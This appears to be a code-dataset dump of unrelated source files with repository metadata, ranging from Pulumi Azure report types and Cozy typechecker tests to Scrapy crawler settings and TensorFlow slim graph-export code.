pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def recurrence(self) -> str:
"""
The schedule recurrence.
"""
return pulumi.get(self, "recurrence")
@property
@pulumi.getter(name="recurrencePeriod")
def recurrence_period(self) -> 'outputs.ReportConfigRecurrencePeriodResponse':
"""
Has start and end date of the recurrence. The start date must be in future. If present, the end date must be greater than start date.
"""
return pulumi.get(self, "recurrence_period")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
The status of the schedule. Whether active or not. If inactive, the report's scheduled execution is paused.
"""
return pulumi.get(self, "status")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigSortingResponse(dict):
"""
The order by expression to be used in the report.
"""
def __init__(__self__, *,
name: str,
direction: Optional[str] = None):
"""
The order by expression to be used in the report.
:param str name: The name of the column to sort.
:param str direction: Direction of sort.
"""
pulumi.set(__self__, "name", name)
if direction is not None:
pulumi.set(__self__, "direction", direction)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the column to sort.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def direction(self) -> Optional[str]:
"""
Direction of sort.
"""
return pulumi.get(self, "direction")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigTimePeriodResponse(dict):
"""
The start and end date for pulling data for the report.
"""
def __init__(__self__, *,
from_: str,
to: str):
"""
The start and end date for pulling data for the report.
:param str from_: The start date to pull data from.
:param str to: The end date to pull data to.
"""
pulumi.set(__self__, "from_", from_)
pulumi.set(__self__, "to", to)
@property
@pulumi.getter(name="from")
def from_(self) -> str:
"""
The start date to pull data from.
"""
return pulumi.get(self, "from_")
@property
@pulumi.getter
def to(self) -> str:
"""
The end date to pull data to.
"""
return pulumi.get(self, "to")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
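The `ReportConfigFilterResponse` class in the row above models recursively nested boolean filter expressions, where the `and`/`or` branches must carry at least two operands. A minimal sketch of that shape as plain dictionaries — the helper names and dimension values below are illustrative assumptions, not part of the Pulumi or Azure SDK surface:

```python
# Illustrative sketch: plain dicts in the nested shape that
# ReportConfigFilterResponse models. Helper names and values are assumptions
# for demonstration, not the Pulumi/Azure SDK API.
def dimension_filter(name, operator, values):
    return {"dimension": {"name": name, "operator": operator, "values": values}}

def and_filter(*filters):
    # Mirrors the documented constraint: the logical "AND" needs >= 2 items.
    if len(filters) < 2:
        raise ValueError('the logical "AND" expression must have at least 2 items')
    return {"and": list(filters)}

combined = and_filter(
    dimension_filter("ResourceLocation", "In", ["East US"]),
    dimension_filter("ResourceType", "In", ["Microsoft.Compute/virtualMachines"]),
)
```

Composing filters through small constructors like these keeps the at-least-two-items rule enforced at construction time rather than at API submission.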
3605648a739014c7dc4d6313d88cac67210e7236 | 1395576291c1e8b34981dbcbfcd0fdda020083b8 | /dist_cts/dist_fleet_2.0/dist_collective_get_world_size.py | be03b9b1e048b699ca046c8e42e74f422e9b1be2 | [] | no_license | gentelyang/scripts | a8eb8a3cc5cc5bac753f1bb12033afaf89f03404 | e3562ab40b574f06bba68df6895a055fa31a085d | refs/heads/master | 2023-06-06T12:38:37.002332 | 2021-06-15T05:09:06 | 2021-06-15T05:09:06 | 262,957,519 | 0 | 4 | null | 2021-01-10T08:28:11 | 2020-05-11T06:28:08 | Python | UTF-8 | Python | false | false | 925 | py | #!/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python
#======================================================================
#
# Copyright (c) 2017 Baidu.com, Inc. All Rights Reserved
#
#======================================================================
"""
/***************************************************************************
*
* Copyright (c) 2019 Baidu.com, Inc. All Rights Reserved
* @file test.py
* @author liyang109@baidu.com
* @date 2020-12-30 15:53
* @brief
*
**************************************************************************/
"""
import sys
import paddle.distributed as dist
from utils import run_priority
@run_priority(level='P0')
def test_get_world_size():
"""get world size"""
assert dist.get_world_size() == 2
print("{} ... ok".format(sys._getframe().f_code.co_name))
if __name__ == '__main__':
test_get_world_size() | [
"liyang109@baidu.com"
] | liyang109@baidu.com |
4b84cabf2fff0894c886b5c793cbbab18128036a | 32552a2c66f9cbdcd5e1d7d8be9a91185344081e | /main.py | 1a157e4b84dccc2da0b952a308dee42d672fb85b | [] | no_license | nik-git/PyRepl | 1f6ff068fa6ee55458f7d9b131db6a6bb9a8a9ac | dbd75a1345cdec299f291d4819eaa48eac126525 | refs/heads/master | 2022-10-03T22:36:36.067629 | 2020-05-30T08:38:53 | 2020-05-30T08:38:53 | 268,037,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37 | py | print("1111111")
print("2222222222")
| [
"replituser@example.com"
] | replituser@example.com |
2d25c71d6e148cc3e4205d67c004c263518568d0 | 2eb6b96565367f2f843c3352cce03fcd7b575757 | /module_sellenium/_test_json.py | 218234e36510aeda14db74969f4e18f0f51ddf6d | [] | no_license | onitonitonito/web_beautifulsoup_scrapping | a712fc7fd58d28f89e5c1ddcbf3faac74552e263 | d07c6eebbf2731754b72b7d13f90be9d0082e776 | refs/heads/master | 2022-12-10T14:58:27.045305 | 2020-06-09T22:21:48 | 2020-07-15T22:22:50 | 148,488,834 | 1 | 1 | null | 2022-12-08T09:39:14 | 2018-09-12T13:56:23 | Python | UTF-8 | Python | false | false | 2,561 | py | """
# Reading and Writing JSON to a File in Python
# By Scott Robinson • August 17, 2016 • 5 Comments
# https://stackabuse.com/reading-and-writing-json-to-a-file-in-python/
"""
# print(__doc__)
import os
# script_run ... different dir script_run vs. terminal(cmd)
print(os.getcwd()) # --> root / working
print(os.path.abspath(os.path.curdir)) # --> root / working
print(os.path.dirname(__file__)) # --> working / working (this!)
import json
dir_current = os.path.dirname(__file__)
dir_read_write = f'{dir_current}/statics'
filename_with_dir = f'{dir_read_write}/_test_json.json'
data = {}
data['people'] = []
data['people'].append({
'name': 'Scott',
'website': 'stackabuse.com',
'from': 'Nebraska'
})
data['people'].append({
'name': 'Larry',
'website': 'google.com',
'from': 'Michigan'
})
data['people'].append({
'name': 'Tim',
'website': 'apple.com',
'from': 'Alabama'
})
with open(file=filename_with_dir, mode='w', encoding='utf8') as file:
json.dump(obj=data, fp=file, sort_keys=True, indent=2, ensure_ascii=False)
"""
{
"people": [
{
"from": "Nebraska",
"name": "Scott",
"website": "stackabuse.com"
},{
"from": "Michigan",
"name": "Larry",
"website": "google.com"
},{
"from": "Alabama",
"name": "Tim",
"website": "apple.com"
}
]
}
"""
with open(file=filename_with_dir, mode='r', encoding='utf8') as file:
_test_json = json.load(fp=file)
for i, people in enumerate(_test_json['people'],1):
[print(echo)
for echo in [
f"\n\n"
f"-------------------------",
f" ({i}) PEOPLE INFORMATION",
f"-------------------------",
f"* Name : {people['name']}",
f"* From : {people['from']}",
f"* Web site : {people['website']}",
f"-------------------------",
]
]
"""
-------------------------
(1) PEOPLE INFORMATION
-------------------------
* Name : Scott
* From : Nebraska
* Web site : stackabuse.com
-------------------------
-------------------------
(2) PEOPLE INFORMATION
-------------------------
* Name : Larry
* From : Michigan
* Web site : google.com
-------------------------
-------------------------
(3) PEOPLE INFORMATION
-------------------------
* Name : Tim
* From : Alabama
* Web site : apple.com
-------------------------
"""
| [
"nitt0x0@gmail.com"
] | nitt0x0@gmail.com |
51541cfc0efce6e3743209630d5aae189c992744 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Kivy/kivy/kivy/tests/test_filechooser_unicode.py | f90c297541a79baedf8ea10dc76f7b6cc75794d2 | [
"MIT"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:29d8bc5fa93406bc313e889d4aeb384ef0b92ca711d0d2dcacbfa64e34adbbca
size 3716
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
2adc1b4411370663446ddd23ae426129db13c18d | 133d0f5c7122829ec1e5a5dacdd96a3fa8aa4fc2 | /tests/typecheck.py | 0830182b40042742b608397268f7f0e3201f1eff | [
"Apache-2.0"
] | permissive | izgzhen/cozy | e4b44bb6939c6892919225bba91520913ba55a75 | fc57fdccdd52c5ecf4c4ae4e8b80af97e8119b77 | refs/heads/master | 2020-03-29T01:01:11.270275 | 2018-09-27T16:39:51 | 2018-09-27T16:39:51 | 149,367,207 | 0 | 0 | Apache-2.0 | 2018-09-19T00:12:02 | 2018-09-19T00:12:02 | null | UTF-8 | Python | false | false | 2,790 | py | import unittest
from cozy.syntax_tools import mk_lambda
from cozy.target_syntax import *
from cozy.structures.heaps import *
from cozy.typecheck import typecheck, retypecheck
class TestTypechecking(unittest.TestCase):
def test_map_over_noncollection(self):
x = EVar("x").with_type(TInt())
e = EMap(x, mk_lambda(TInt(), lambda elem: EBool(True)))
errs = typecheck(e, { x.id : x.type })
assert errs
def test_filter_over_noncollection(self):
x = EVar("x").with_type(TInt())
e = EFilter(x, mk_lambda(TInt(), lambda elem: EBool(True)))
errs = typecheck(e, { x.id : x.type })
assert errs
def test_flatmap(self):
e = EBinOp(EFlatMap(EBinOp(EVar('ys').with_type(TBag(THandle('ys', TInt()))), '+', EEmptyList().with_type(TBag(THandle('ys', TInt())))).with_type(TBag(THandle('ys', TInt()))), ELambda(EVar('_var12').with_type(THandle('ys', TInt())), EUnaryOp('sum', ESingleton(ENum(1).with_type(TInt())).with_type(TBag(TInt()))).with_type(TInt()))).with_type(TBag(TInt())), '==', ENum(0).with_type(TInt())).with_type(TBool())
assert not retypecheck(e)
def test_sum(self):
xs = EVar("xs").with_type(TBag(TBool()))
e = EUnaryOp("sum", xs)
assert not retypecheck(e)
def test_ECond_1(self):
x = ENum(1).with_type(INT)
assert retypecheck(ECond(EBool(True), x, x))
def test_ECond_2(self):
x = ENum(1).with_type(INT)
y = EBool(False)
assert not retypecheck(ECond(EBool(True), x, y))
def test_ECond_3(self):
x = ENum(1).with_type(INT)
y = EBool(False)
assert not retypecheck(ECond(EBool(True), y, x))
def test_ECond_4(self):
x = ENum(1).with_type(INT)
assert not retypecheck(ECond(x, x, x))
def test_lambda_arg_inference(self):
s = ESingleton(ETRUE)
x = EVar("x")
assert retypecheck(EFilter(s, ELambda(x, x)))
assert retypecheck(EMap(s, ELambda(x, x)))
assert retypecheck(EMakeMap2(s, ELambda(x, x)))
def test_heaps(self):
e = ECond(EBinOp(EBinOp(EMapGet(EStateVar(EMakeMap2(EVar('xs'), ELambda(EVar('_var39381'), EUnaryOp('len', EFilter(EVar('xs'), ELambda(EVar('_var39382'), EBinOp(EVar('_var39381'), '==', EVar('_var39382')))))))), ENum(0).with_type(INT)), '==', ENum(1).with_type(INT)), 'and', EBinOp(ENum(0).with_type(INT), '==', EStateVar(EArgMin(EVar('xs'), ELambda(EVar('_var21501'), EVar('_var21501')))))), EHeapPeek2(EStateVar(EMakeMinHeap(EVar('xs'), ELambda(EVar('_var21501'), EVar('_var21501')))), EStateVar(EUnaryOp('len', EVar('xs')))), EStateVar(EArgMin(EVar('xs'), ELambda(EVar('_var21501'), EVar('_var21501')))))
assert retypecheck(e, env={
"xs": INT_BAG,
"_var21501": INT})
| [
"loncaric@cs.washington.edu"
] | loncaric@cs.washington.edu |
fd2b0f889ccef3fce7487a8374f5de0e950177a6 | 561464f786e855668663a6928f123beaf05b1f1f | /wsgi.py | 51888168228f9dbeb1e14074af7757da37a66770 | [] | no_license | Coderpool/Coderpool-Registration-App | 0ee2ebc0e5c14d1af98f13d19e9604c1afaa7878 | adf29303cf113650544ea86fa5b17e52d89e99fc | refs/heads/master | 2021-01-15T13:29:30.045896 | 2013-12-06T01:55:25 | 2013-12-06T01:55:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 306 | py | import os
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
project_home = BASE_DIR
if project_home not in sys.path:
sys.path.append(project_home)
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
| [
"rajeevs1992@gmail.com"
] | rajeevs1992@gmail.com |
05d70d9526d627b8fe1b541ceec8e5df4e321c8a | 5dc7dcf5938a60f1dc23cb0bf7578f2ae9ca283a | /main.py | d26fe77abc6cb68504c30ed0aeb4cedd063bbbc9 | [] | no_license | afcarl/Visual-Ballistic-Roulette-Vision | 41cbb83b6115c8d7cf81a1c05054a1a02da82de7 | d4209b92f529256b956fbae78ebaac856cd61e04 | refs/heads/master | 2020-03-22T01:10:09.763037 | 2017-02-10T06:38:04 | 2017-02-10T06:38:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | import os
from ball_tracking_from_gradients import start_ball_analysis
from utils import results_dir
from wheel_green_tracking_from_frames import start_wheel_analysis
def list_to_str(s):
return str(', '.join(['{0:.2f}'.format(b) for b in s]) + '\n')
if __name__ == '__main__':
print('Python script has started. Please wait.')
balls = start_ball_analysis()
wheels = start_wheel_analysis()
print('\n -- \n')
print('BALL = {}'.format(balls))
print('WHEEL = {}'.format(wheels))
results_filename = os.path.join(results_dir(), 'results.txt')
with open(results_filename, 'wt', encoding='utf-8') as f:
f.write(list_to_str(balls))
f.write(list_to_str(wheels))
| [
"premy@reactive.co.jp"
] | premy@reactive.co.jp |
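The `list_to_str` helper in the row above renders each reading to two decimal places and terminates the line; a standalone copy of the same expression (isolated here because the script's other imports are project-specific tracking modules) shows the output shape:

```python
# Standalone copy of main.py's list_to_str helper, free of the project's
# tracking-module imports, so its formatting can be exercised directly.
def list_to_str(s):
    return str(', '.join(['{0:.2f}'.format(b) for b in s]) + '\n')

print(repr(list_to_str([1.5, 2.0, 3.14159])))  # '1.50, 2.00, 3.14\n'
```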
158ccde3af8d872aa64f1f1b97bb0a698fd8a377 | c4fa1ebcdd413c4ab3f0979ee3beead8a8809870 | /providers/edu/pdxscholar/migrations/0001_initial.py | 795f466f367dfb4f418cfb10dda1a00b2ca7243e | [] | no_license | terroni/SHARE | e47f291db7cf100d29a7904fe820e75d29db1472 | a5631f441da1288722c68785b86128c854cbe7c1 | refs/heads/develop | 2020-12-03T02:29:47.381341 | 2016-07-11T19:40:27 | 2016-07-11T19:40:27 | 63,097,148 | 1 | 0 | null | 2016-07-11T19:45:51 | 2016-07-11T19:45:50 | null | UTF-8 | Python | false | false | 667 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-08 15:45
from __future__ import unicode_literals
from django.db import migrations
import share.robot
class Migration(migrations.Migration):
dependencies = [
('share', '0001_initial'),
('djcelery', '0001_initial'),
]
operations = [
migrations.RunPython(
code=share.robot.RobotUserMigration('edu.pdxscholar'),
),
migrations.RunPython(
code=share.robot.RobotOauthTokenMigration('edu.pdxscholar'),
),
migrations.RunPython(
code=share.robot.RobotScheduleMigration('edu.pdxscholar'),
),
]
| [
"cwisecarver@cos.io"
] | cwisecarver@cos.io |
008b8ae4c04e14d9cdce23fbd160c2d6fada69a3 | e2e1732b6eb1a7a6dfeba76762851ad06eb8e482 | /wangban/wangban/spiders/beifen/2/ningbo/daxiekaifaqu.py | 1c2493c906df0eb3ec37744b776a18dbfa62a0cb | [] | no_license | nightqiuhua/bigCrawlers | 551e80d55df492c89ae0e0e0bd70c0e5f873068d | 19b86130c8af057d06014865d150e3d2ed6cc319 | refs/heads/main | 2023-03-23T01:13:26.021850 | 2021-03-03T15:09:28 | 2021-03-03T15:09:28 | 344,165,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,823 | py | # -*- coding: utf-8 -*-
import os
from datetime import datetime
from urllib.parse import urlparse
import re
import time
from wangban_utils.Json2Xpath import Json2XPath,XPath
from wangban_utils.single_mode import singleton
from urllib.parse import urljoin
from scrapy.utils.project import get_project_settings
from spiders.basemodel import DIYBaseSpider
SETTINGS = get_project_settings()
JSONFILE = os.path.join(SETTINGS['BASE_JSONFILE_PATH'],'daxiekaifaqu.json')
@singleton
class DaXieKaiFaQuSpider(DIYBaseSpider):
name = 'daxiekaifaqu'
start_urls = ['http://daxie.bidding.gov.cn/']
source_website = '宁波市大榭开发区公共资源交易网'
specific_area = '大榭开发区'
source_url = 'http://daxie.bidding.gov.cn/'
links_tree = {}
loss_urls = {}
column_urls_pool = []
def __init__(self,jsonfile = JSONFILE):
super().__init__()
self.xp = Json2XPath(jsonfile).get_xpath()
self.post_suf = 'index_{}'
def get_totalpage(self,response):
try:
total_page = response.xpath(self.xp.total_page).extract()[0]
#print(response.xpath(self.xp.total_page).extract())
total_page = re.findall(r'/(\d+)页',total_page)[0]
except Exception as e:
print('get_totalpage error_reason',e)
print('url',response.url)
total_page = 1
#print('total_page is ',total_page)
total_page = self.set_totalpage(total_page)
return total_page
def get_elem_url(self,element,response=None):
an_url = self.source_url
try:
elem_url = element.xpath(self.xp.an_url).extract()[0]
an_url = urljoin(self.source_url,elem_url)
except Exception as e:
print('get_elem_url error',e)
print('url',response.url)
an_url = self.source_url
#print(an_url)
return an_url
def get_on_date(self,element,response=None):
try:
on_date = element.xpath(self.xp.on_date).extract()[0]
on_date = re.findall(r'(\d+-\d+-\d+)',on_date)[0]
except Exception as e:
on_date = 'NONE'
print('get on date error',e)
print('url',response.url)
#print(on_date)
return on_date
def get_an_title(self,element,response=None):
an_title = 'NONE'
try:
an_title = element.xpath(self.xp.an_title).extract()[0]
except Exception as e:
print('get_an_title error',e)
print('url',response.url)
#print(an_title)
return an_title
def cre_page_url(self,f_p_url,page):
if page == 0:
page = 1
page_url = f_p_url.replace('index',self.post_suf.format(page))
#print('page_url',page_url)
return page_url | [
"1320551630@qq.com"
] | 1320551630@qq.com |
8bc54841f877590a71e85e5c7203a64d7bac48f9 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03959/s162228731.py | 956fa1077360361e08a0ffa20848604515bb78c8 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 985 | py | def work(n, t, a):
    if t[-1] != a[0]:
        return 0
    middle = 0
    for i in range(n):
        if t[i] == a[i]:
            if t[i] != t[-1] or t[i] != a[0]:
                return 0
            middle = i
            break
    for i in range(middle, n):
        if t[i] < a[i]:
            return 0
    record = [None] * n
    left, right = 0, n - 1
    while left <= right and t[left] < a[left]:
        if not left or t[left] > t[left-1]:
            record[left] = 1
        else:
            record[left] = t[left]
        left += 1
    record[left] = 1
    while left < right and a[right] <= t[right]:
        if right == n - 1 or a[right] > a[right+1]:
            record[right] = 1
        else:
            record[right] = a[right]
        right -= 1
    ans = 1
    for i in range(n):
        ans = (ans * record[i]) % (10**9 + 7)
    return ans


n = int(input())
t = list(map(int, input().split()))
a = list(map(int, input().split()))
print(work(n, t, a))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
44c2bb2dde1375f2c6043f1a16a82e63308efb08 | 5b95b83ba7e18cb40babab37bcb0f5b63bfef3bb | /script15.py | 443a772f633bd2334e704eeac1f382924dbc5e23 | [] | no_license | Moandh81/w3ressources_python | d9269959cc35c1df4a0ca9d37575c94fb96195f6 | 7a3c65bca50097c2e9b92591443dcb6b03a384a3 | refs/heads/master | 2020-03-30T22:42:23.673212 | 2019-11-11T19:58:16 | 2019-11-11T19:58:16 | 151,675,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#Python Data Type: String - Exercises
#Write a Python function to get a string made of 4 copies of
#the last two characters of a specified string (length must be at least 2).
chaine = "Hello world"
if len(chaine) >= 2:
    print((chaine[len(chaine) - 2] + chaine[len(chaine) - 1]) * 4)
else:
    print("the string does not have at least two characters and therefore cannot be processed") | [
"anis.dhouieb@gmail.com"
] | anis.dhouieb@gmail.com |
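script15.py above builds the result from two explicit index expressions; the same exercise is usually written with a negative slice, since `s[-2:]` is exactly the last two characters. The function name below is illustrative:

```python
# Sketch equivalent to script15.py: s[-2:] replaces the len()-based indexing.
def last_two_times_four(s):
    if len(s) < 2:
        raise ValueError("string must have at least 2 characters")
    return s[-2:] * 4

print(last_two_times_four("Hello world"))  # ldldldld
```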
5d0e40c90b389c948a09261dfa0d920b443dbb01 | df3acbc57da3462643288504c5f5c8ba00e142a6 | /DangDang_Books/dangdang/dangdang/settings.py | 1d82ea3fb7ff2f9b3fc9c766c0089c03cbbae342 | [] | no_license | tangzhen10/Python_Crawler | 7817c38b01410364e94f76694cb92826b0859400 | 18dfd7e755b163ce15f9acd0bc49e8c450ff6198 | refs/heads/master | 2020-07-27T08:28:13.245375 | 2019-09-04T11:04:23 | 2019-09-04T11:04:23 | 209,029,654 | 1 | 0 | null | 2019-09-17T10:55:10 | 2019-09-17T10:55:10 | null | UTF-8 | Python | false | false | 3,092 | py | # -*- coding: utf-8 -*-
# Scrapy settings for dangdang project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'dangdang'
SPIDER_MODULES = ['dangdang.spiders']
NEWSPIDER_MODULE = 'dangdang.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'dangdang (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'dangdang.middlewares.DangdangSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'dangdang.middlewares.DangdangDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'dangdang.pipelines.DangdangPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"why957177569@163.com"
] | why957177569@163.com |
cbf52a5a72f51750a9828b5b79b7616c161ce741 | 1cd909991a97c12752d81e334659c573c3bb6652 | /cheritest/trunk/tests/mt/test_mt_rdhwr.py | 2a1403eacaf47d96ff7989d204bd617ee83ff27c | [
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-beri-hw-sw-1.0"
] | permissive | conan789123/beri | 47ce884d5bf5635ef5dd3e64adfe7735996384ad | cef1b41d52592cfa7454ddf59f9f2994e447cd66 | refs/heads/master | 2020-03-28T05:57:17.172443 | 2017-03-27T17:21:10 | 2017-03-27T17:21:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,520 | py | #-
# Copyright (c) 2014 Michael Roe
# All rights reserved.
#
# This software was developed by SRI International and the University of
# Cambridge Computer Laboratory under DARPA/AFRL contract FA8750-10-C-0237
# ("CTSRD"), as part of the DARPA CRASH research programme.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
from nose.plugins.attrib import attr
class test_mt_rdhwr(BaseBERITestCase):
@attr('mt')
@attr('rdhwr')
@attr('userlocal')
def test_rdhwr_1(self):
'''Test that the user-local register has a per-thread value'''
self.assertRegisterEqual(self.MIPS.a0, 0, "The user local register did not have a per-thread value")
| [
"cl-beri-discuss@lists.cam.ac.uk"
] | cl-beri-discuss@lists.cam.ac.uk |
331bef022949cda2d9ab90b645a7c857d91a7fd5 | abc4ad00b4f267e43954db01f6540282a5d0ffea | /code/export_inference_graph.py | 2b35b3534477d1b4549653aef6eb001111178eb3 | [] | no_license | yuanyuanzijin/flower-recognition | 0ed6ab7bbcf91779cefab77f924942071690fe0e | 971e43b4926c6b8b14e91c3b1ccbeea2d8d60334 | refs/heads/master | 2021-08-29T23:14:33.395849 | 2017-12-14T23:49:50 | 2017-12-14T23:49:50 | 114,340,517 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,953 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Saves out a GraphDef containing the architecture of the model.
To use it, run something like this, with a model name defined by slim:
bazel build tensorflow_models/slim:export_inference_graph
bazel-bin/tensorflow_models/slim/export_inference_graph \
--model_name=inception_v3 --output_file=/tmp/inception_v3_inf_graph.pb
If you then want to use the resulting model with your own or pretrained
checkpoints as part of a mobile model, you can run freeze_graph to get a graph
def with the variables inlined as constants using:
bazel build tensorflow/python/tools:freeze_graph
bazel-bin/tensorflow/python/tools/freeze_graph \
--input_graph=/tmp/inception_v3_inf_graph.pb \
--input_checkpoint=/tmp/checkpoints/inception_v3.ckpt \
--input_binary=true --output_graph=/tmp/frozen_inception_v3.pb \
--output_node_names=InceptionV3/Predictions/Reshape_1
The output node names will vary depending on the model, but you can inspect and
estimate them using the summarize_graph tool:
bazel build tensorflow/tools/graph_transforms:summarize_graph
bazel-bin/tensorflow/tools/graph_transforms/summarize_graph \
--in_graph=/tmp/inception_v3_inf_graph.pb
To run the resulting graph in C++, you can look at the label_image sample code:
bazel build tensorflow/examples/label_image:label_image
bazel-bin/tensorflow/examples/label_image/label_image \
--image=${HOME}/Pictures/flowers.jpg \
--input_layer=input \
--output_layer=InceptionV3/Predictions/Reshape_1 \
--graph=/tmp/frozen_inception_v3.pb \
--labels=/tmp/imagenet_slim_labels.txt \
--input_mean=0 \
--input_std=255 \
--logtostderr
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.python.platform import gfile
from datasets import dataset_factory
from preprocessing import preprocessing_factory
from nets import nets_factory
slim = tf.contrib.slim
tf.app.flags.DEFINE_string(
'model_name', 'inception_v3', 'The name of the architecture to save.')
tf.app.flags.DEFINE_boolean(
'is_training', False,
'Whether to save out a training-focused version of the model.')
tf.app.flags.DEFINE_integer(
'default_image_size', 224,
'The image size to use if the model does not define it.')
tf.app.flags.DEFINE_string('dataset_name', 'imagenet',
'The name of the dataset to use with the model.')
tf.app.flags.DEFINE_integer(
'labels_offset', 0,
'An offset for the labels in the dataset. This flag is primarily used to '
'evaluate the VGG and ResNet architectures which do not use a background '
'class for the ImageNet dataset.')
tf.app.flags.DEFINE_string(
'output_file', '', 'Where to save the resulting file to.')
tf.app.flags.DEFINE_string(
'dataset_dir', '', 'Directory to save intermediate dataset files to')
